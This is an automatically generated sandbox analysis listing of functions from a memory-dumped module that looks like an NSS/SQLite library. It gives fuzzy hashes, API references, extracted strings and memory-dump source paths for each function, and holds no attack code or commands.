Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Arena_CriticalEnterErrorGrow_Mark_SectionUnlock$AllocateContentCopyDestroyFindFreeInfoItem_Tag_
String ID:
API String ID: 4287675220-0
Opcode ID: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
Instruction ID: 7056f995e2011e928ae7102999403c56b2c87008616075db71ac6bf36d78ee78
Opcode Fuzzy Hash: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
Instruction Fuzzy Hash: DD112BB5F042015BF7149B659D00B9BB395AF9534CF144234F90AAB780FB61E918C29E

Function 6C6BCDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6BD086
PR_Malloc.NSS3(00000001), ref: 6C6BD0B9
PR_Free.NSS3(?), ref: 6C6BD138

Strings

>, xrefs: 6C6BCF5B

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: 2658ba760eb3cff6b280ae6aad08cde1fd60834b559732f38acce713ee374c0e
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: 6DD16B62B455464FEB14487C8CA13EA77938783378F584329D522BFBE9E6398963C30D

Function 6C53AC60 Relevance: 6.4, Strings: 5, Instructions: 181COMMON

Download Yara Rule

Strings

0kl, xrefs: 6C53ACC0, 6C53AD22, 6C53AD5E, 6C53AE45
winUnlock, xrefs: 6C53AE18
pkl, xrefs: 6C53ADA7
winUnlockReadLock, xrefs: 6C53AE9F
Pkl, xrefs: 6C53ADDB, 6C53ADF5, 6C53AE6A

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID:
String ID: 0kl$Pkl$pkl$winUnlock$winUnlockReadLock
API String ID: 0-1038035488
Opcode ID: 06c13ab2aa3ccb41f2adc8afe4c419d47777d73bb9e0f8ebfdbada887a471ce1
Instruction ID: 5775207ee16f2230e1c0e9469c70794fec81b291a3367507c2da9b04438bddd2
Opcode Fuzzy Hash: 06c13ab2aa3ccb41f2adc8afe4c419d47777d73bb9e0f8ebfdbada887a471ce1
Instruction Fuzzy Hash: 0E7190706083049FDB04CF29E884AAABBF5FF89314F14CA1DF95997241EB30A985CBD5

Function 6C65AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6eef25017dea92f9550db25b3d550aed64f83ef58ed5688878378f456d7e591
Instruction ID: 3230890c44d72cdefa34e3057c0e8407022c3448d3ad690b0883e5031226e106
Opcode Fuzzy Hash: b6eef25017dea92f9550db25b3d550aed64f83ef58ed5688878378f456d7e591
Instruction Fuzzy Hash: 29F114B1F012158FDB04CF29D8843A97BF2AB8A308F65423DC921D7754EB749961CBD9

Function 6C64DFC0 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 344stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C525001,?,00000003,00000000), ref: 6C64DFD7
memset.VCRUNTIME140(00000000,00000000,?,?,?,00000003,?,6C525001,?), ref: 6C64E2B7
memcpy.VCRUNTIME140(00000028,00000003,?,?,?,?,?,?,00000003,?,6C525001,?), ref: 6C64E2DA

Strings

W, xrefs: 6C64E111

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: memcpymemsetstrlen
String ID: W
API String ID: 160209724-655174618
Opcode ID: 0828136bd935ed5acb986ec4be38e53d9a41afce1a2cce9d6b2b91f6e030e027
Instruction ID: be127f95037556fb8f6f8a21a6514874dc130be69e58ef8d84bff6b3f98b51b3
Opcode Fuzzy Hash: 0828136bd935ed5acb986ec4be38e53d9a41afce1a2cce9d6b2b91f6e030e027
Instruction Fuzzy Hash: 28C11831B48655CBDB05CF2984906EAF7B2BF86308F18C1B9DD699BB41D7319811C7D8

Function 6C610E20 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6C611052
memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6C611086

Strings

h(al, xrefs: 6C610E55, 6C610EC4, 6C610F3A, 6C610FA7
h(al, xrefs: 6C611062, 6C61105D, 6C610F37, 6C611081, 6C611082

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: memcpymemset
String ID: h(al$h(al
API String ID: 1297977491-3183079524
Opcode ID: b281ce86477fa6574a759025834ccc30308d8e310c5042e08501f3f136f6609d
Instruction ID: 422d236cccafc4e8e3238253fb335847028e2a16a36e3a760009779801fa1fb0
Opcode Fuzzy Hash: b281ce86477fa6574a759025834ccc30308d8e310c5042e08501f3f136f6609d
Instruction Fuzzy Hash: A9A13C71B0524A9FCF08CF9DC990AEEBBB6BF49315B148129E904A7B00D735AC11CB94

Function 6C534DB0 Relevance: 5.3, Strings: 4, Instructions: 318COMMON

Download Yara Rule

Strings

0kl, xrefs: 6C534EDE, 6C534F82
pkl, xrefs: 6C534E1C, 6C534E81, 6C534FDE, 6C535047, 6C5350BB, 6C5351A3, 6C53526C
winUnlockReadLock, xrefs: 6C535125
Pkl, xrefs: 6C535019, 6C5350FA, 6C535157, 6C5351DE, 6C5351F2, 6C53520D, 6C535220, 6C5352A2, 6C5352B5

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID:
String ID: 0kl$Pkl$pkl$winUnlockReadLock
API String ID: 0-3348065622
Opcode ID: 1769cc6396da237c39174d73ca29fa898b6db5af57898173abbc408cc68e80f6
Instruction ID: 5e47a27b7fb717356efd3182682e4e9a2ee606d506ed91a22a2362aa7de41fe6
Opcode Fuzzy Hash: 1769cc6396da237c39174d73ca29fa898b6db5af57898173abbc408cc68e80f6
Instruction Fuzzy Hash: 6EE13CB1A083408FDB04DF29D88865ABBF1FF89304F559A1DF89997351EB30D985CB86

Function 6C536F10 Relevance: 5.2, Strings: 4, Instructions: 218COMMON

Download Yara Rule

Strings

sz=[0-9]*, xrefs: 6C537049
noskipscan*, xrefs: 6C537067
unordered*, xrefs: 6C53702B
*?[, xrefs: 6C537034, 6C537052, 6C537070

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID:
String ID: *?[$noskipscan*$sz=[0-9]*$unordered*
API String ID: 0-3485574213
Opcode ID: a472298952581d32543518842fbc35d50cb8e49881f763b09017643bc8a0e094
Instruction ID: 6dc7f3582477dc9050d47e2acbf3a1f80bff12a315f285c67a766c48a831fab3
Opcode Fuzzy Hash: a472298952581d32543518842fbc35d50cb8e49881f763b09017643bc8a0e094
Instruction Fuzzy Hash: 38718C32F042318BEB10CA6DCC8039A77A29F85354F251279C86DABBD5FA759C468BC1

Function 6C553EC0 Relevance: 4.3, Strings: 3, Instructions: 583COMMON

Download Yara Rule

Strings

sqlite_temp_master, xrefs: 6C55460F
sqlite_, xrefs: 6C553FAA, 6C554185
sqlite_master, xrefs: 6C55463F

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID:
String ID: sqlite_$sqlite_master$sqlite_temp_master
API String ID: 0-4221611869
Opcode ID: b11e366cca99e6c5ab95f33f23d07d21ca1edba0c8fa7cff6b54fe822c57ade6
Instruction ID: eeb1d9a617ac50e7399a8d688a66d47a1b8b3e1c60db0e4f5043df24fb84d703
Opcode Fuzzy Hash: b11e366cca99e6c5ab95f33f23d07d21ca1edba0c8fa7cff6b54fe822c57ade6
Instruction Fuzzy Hash: 5D225935B4C1958FD704CB2588602B67BF2AF46318BE949EAC9E15FE56C722E871C780

Function 6C68BE70 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 1029COMMON

Download Yara Rule

Strings

`, xrefs: 6C68C0B6

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: a127967ed6535d60e906ab6e81aaf543878379bb7934acb3aea6cfce3485a07e
Instruction ID: a43966d6d4c6095a14928463abcd8d5133854fa6a9d4174bd057386318184269
Opcode Fuzzy Hash: a127967ed6535d60e906ab6e81aaf543878379bb7934acb3aea6cfce3485a07e
Instruction Fuzzy Hash: 1D92A174A05209DFDB05DF64C890BAEBBB2FF88308F244269D512A7B91D735EC46CB64

Function 6C523D80 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 164COMMON

Download Yara Rule

APIs

htonl.WSOCK32(00000000), ref: 6C523EA9

Strings

0, xrefs: 6C523DAB

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: htonl
String ID: 0
API String ID: 2009864989-4108050209
Opcode ID: e631e44ba51c6bc41ac232d427f100c7d522f6832810af8d58e7a31c69e37d7b
Instruction ID: 8265cb76a751a54a8b4044124b77418a0b6b8c342fba2acf0c68a06269e2584a
Opcode Fuzzy Hash: e631e44ba51c6bc41ac232d427f100c7d522f6832810af8d58e7a31c69e37d7b
Instruction Fuzzy Hash: 93512632E490B98AEB15867D8C603FFBBF99B83314F19432AC9A567AC0D63C454D87D0

Function 6C5CEE70 Relevance: 3.2, APIs: 2, Instructions: 223COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5CF019
PK11_GenerateRandom.NSS3(?,00000000), ref: 6C5CF0F9

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ErrorGenerateK11_Random
String ID:
API String ID: 3009229198-0
Opcode ID: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction ID: 330d22ce457fb1dd86d7fdf13087fb973216d1787bd3ed474b99c61d752711d9
Opcode Fuzzy Hash: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction Fuzzy Hash: E9917E75B0161A8BCB14CFA8CC916AEB7F1FF85324F24472DD962A7B80D734A905CB52

Function 6C5F2F70 Relevance: 3.1, APIs: 2, Instructions: 149COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000000,?,6C617929), ref: 6C5F2FAC
PR_SetError.NSS3(FFFFE040,00000000,00000000,?,6C617929), ref: 6C5F2FE0

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Error
String ID:
API String ID: 2619118453-0
Opcode ID: 88305780621aa28bfd5a1435726c4c0a44372ff9ca421ef631d006e373d795d2
Instruction ID: 2ada49b2db1eb8f806a15a824608426a0d192c802eb9e558259662a47938ec50
Opcode Fuzzy Hash: 88305780621aa28bfd5a1435726c4c0a44372ff9ca421ef631d006e373d795d2
Instruction Fuzzy Hash: 285122B1A049118FE708CE59CC80B6A73B9FB85318F29457AD9299BB01D731ED47CF82

Function 6C5FED70 Relevance: 1.7, APIs: 1, Instructions: 217memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6C5FEE3D

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Alloc_ArenaUtil
String ID:
API String ID: 2062749931-0
Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction ID: 84b2a3b3cdc3e13f63ffb89220fb38be221785c41d86ed0c9efe5e9d35816373
Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction Fuzzy Hash: 4471B072E017018FE718CF59D88066ABBF2AB88304F15862DD96697B91D7B0E942CF91

Function 6C525F30 Relevance: 1.6, APIs: 1, Instructions: 350stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000), ref: 6C526013

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: strcmp
String ID:
API String ID: 1004003707-0
Opcode ID: 48203dc2a0160bbb1e653d14772a2fa324b95609641f191c67326967134ff28c
Instruction ID: dc46e630d45c589cbf060c53c93effe2f5cf921f1be3382e65ed353d089764ab
Opcode Fuzzy Hash: 48203dc2a0160bbb1e653d14772a2fa324b95609641f191c67326967134ff28c
Instruction Fuzzy Hash: CBC123B4A053068BDB14CF15CC907AAB7F2AF85318F688168D9A5CBBC5DB39EC41C790

Function 6C6B5E60 Relevance: 1.4, APIs: 1, Instructions: 163COMMON

Download Yara Rule

APIs

Part of subcall function 6C6B5B90: PR_Lock.NSS3(00010000,?,00000000,?,6C59DF9B), ref: 6C6B5B9E
Part of subcall function 6C6B5B90: PR_Unlock.NSS3 ref: 6C6B5BEA

memset.VCRUNTIME140(00000014,00000000,-000000D7,?,?,?,?,?,?,?,?,6C6B5E23,6C59E154), ref: 6C6B5EBF

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: LockUnlockmemset
String ID:
API String ID: 1725470033-0
Opcode ID: 765870e01ac74a1a285e53e67be40ac57547b096a3347e8632765bb24f41ae14
Instruction ID: b13fb44a664ea0489887c371c7159153b34154f829c42734586c46392394d5ee
Opcode Fuzzy Hash: 765870e01ac74a1a285e53e67be40ac57547b096a3347e8632765bb24f41ae14
Instruction Fuzzy Hash: 58519D72E0022A8FDB18CF59C8816AEF7B2FF98314B19456DD815B7745D730A951CBA0

Function 6C66DCD0 Relevance: .4, Instructions: 371COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed0c72a92fba7f2bd9f9977d7db8b9b49ceebd7d17f98c35464f6a286ee92990
Instruction ID: 7ad03b6a70b1d0e7cf79b1ecf3260bee888a113994c3fa4ba9fd61e9e35a86ac
Opcode Fuzzy Hash: ed0c72a92fba7f2bd9f9977d7db8b9b49ceebd7d17f98c35464f6a286ee92990
Instruction Fuzzy Hash: 7CF16D71A01205CFDB08CF1AD894BAA77B2BF89314F294169D8199FB41DB35EC42CBD6

Function 6C601DC0 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
Instruction ID: 8e660e0ff4fd199f059cb621230ac1ef12d155a9a9252406f1c2ab61d4642a16
Opcode Fuzzy Hash: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
Instruction Fuzzy Hash: 51D15732B096168BDB198E18C9843DE7763AF85328F5D4369DD643B7C6C37A9906C3C4

Function 6C598EA0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9971269bc88f9968f860935cdaa0261286bf06a6b1318358b0fb892095ec6c53
Instruction ID: e867bfd782a93813b27c6b6ff9b4374be3a5ba31f86e636744f7b91d2f83eb27
Opcode Fuzzy Hash: 9971269bc88f9968f860935cdaa0261286bf06a6b1318358b0fb892095ec6c53
Instruction Fuzzy Hash: 8411C172A002558BD704CF25DC84B5AB7A6FF4231CF0446EAD8168FA41C775E886C7C2

Function 6C670C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

